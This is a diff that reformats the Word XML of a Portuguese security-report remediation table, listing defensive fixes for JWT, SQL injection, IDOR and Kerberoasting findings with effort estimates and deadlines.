-              <w:bottom w:type="dxa" w:w="50"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>ID</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2550" w:type="pct"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="194FE3"/>
+            <w:tcMar>
+              <w:top w:w="50" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="50" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4676,19 +4974,19 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Ação de correção</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="11%"/>
-            <w:shd w:fill="194FE3" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="50"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="50"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Ação de correção</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="550" w:type="pct"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="194FE3"/>
+            <w:tcMar>
+              <w:top w:w="50" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="50" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4700,19 +4998,19 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Esforço</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="8%"/>
-            <w:shd w:fill="194FE3" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="50"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="50"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Esforço</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="400" w:type="pct"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="194FE3"/>
+            <w:tcMar>
+              <w:top w:w="50" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="50" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4724,19 +5022,19 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Prazo</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="7%"/>
-            <w:shd w:fill="194FE3" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="50"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="50"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Prazo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="350" w:type="pct"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="194FE3"/>
+            <w:tcMar>
+              <w:top w:w="50" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="50" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4748,20 +5046,27 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">QW</w:t>
+              <w:t>QW</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:shd w:fill="B91C1C" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="B91C1C"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4773,17 +5078,18 @@
                 <w:sz w:val="14"/>
                 <w:szCs w:val="14"/>
               </w:rPr>
-              <w:t xml:space="preserve">Imediata</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Imediata</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4793,17 +5099,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-01</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-01</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4813,17 +5120,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Fixar o algoritmo esperado (ex.: RS256) no verificador e rejeitar explicitamente "none"; rotacionar segredos e invalidar sessões emitidas.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Fixar o algoritmo esperado (ex.: RS256) no verificador e rejeitar explicitamente "none"; rotacionar segredos e invalidar sessões emitidas.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4835,17 +5143,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Baixo</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Baixo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4855,17 +5164,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">2d</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>2d</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4877,20 +5187,27 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">★</w:t>
+              <w:t>★</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:shd w:fill="B91C1C" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="B91C1C"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4902,17 +5219,18 @@
                 <w:sz w:val="14"/>
                 <w:szCs w:val="14"/>
               </w:rPr>
-              <w:t xml:space="preserve">Imediata</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Imediata</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4922,17 +5240,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-02</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-02</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4942,17 +5261,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Usar consultas parametrizadas/prepared statements e ORM seguro; adicionar WAF como camada defensiva e princípio do menor privilégio no usuário de banco.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Usar consultas parametrizadas/prepared statements e ORM seguro; adicionar WAF como camada defensiva e princípio do menor privilégio no usuário de banco.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4964,17 +5284,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Médio</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Médio</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4984,17 +5305,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">5d</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>5d</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5006,20 +5328,27 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">—</w:t>
+              <w:t>—</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:shd w:fill="B91C1C" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="B91C1C"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5031,17 +5360,18 @@
                 <w:sz w:val="14"/>
                 <w:szCs w:val="14"/>
               </w:rPr>
-              <w:t xml:space="preserve">Imediata</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Imediata</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5051,17 +5381,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-03</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-03</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5071,17 +5402,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Validar a propriedade do objeto no servidor (order.customer_id == session.user_id) e usar referências indiretas por usuário; incluir testes de autorização por objeto.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Validar a propriedade do objeto no servidor (order.customer_id == session.user_id) e usar referências indiretas por usuário; incluir testes de autorização por objeto.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5093,17 +5425,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Baixo</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Baixo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5113,17 +5446,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">3d</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>3d</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5135,20 +5469,27 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">★</w:t>
+              <w:t>★</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:shd w:fill="EA580C" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="EA580C"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5160,17 +5501,18 @@
                 <w:sz w:val="14"/>
                 <w:szCs w:val="14"/>
               </w:rPr>
-              <w:t xml:space="preserve">Curto prazo</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Curto prazo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5180,17 +5522,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-04</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-04</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5200,17 +5543,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Adotar gMSA ou senhas longas/aleatórias para contas de serviço; monitorar solicitações TGS-REQ anômalas e remover SPNs desnecessários.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Adotar gMSA ou senhas longas/aleatórias para contas de serviço; monitorar solicitações TGS-REQ anômalas e remover SPNs desnecessários.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5222,17 +5566,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Alto</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Alto</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5242,17 +5587,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">20d</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>20d</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5264,20 +5610,27 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">—</w:t>
+              <w:t>—</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:shd w:fill="EA580C" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="EA580C"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5289,17 +5642,18 @@
                 <w:sz w:val="14"/>
                 <w:szCs w:val="14"/>
               </w:rPr>
-              <w:t xml:space="preserve">Curto prazo</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Curto prazo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5309,17 +5663,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-05</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
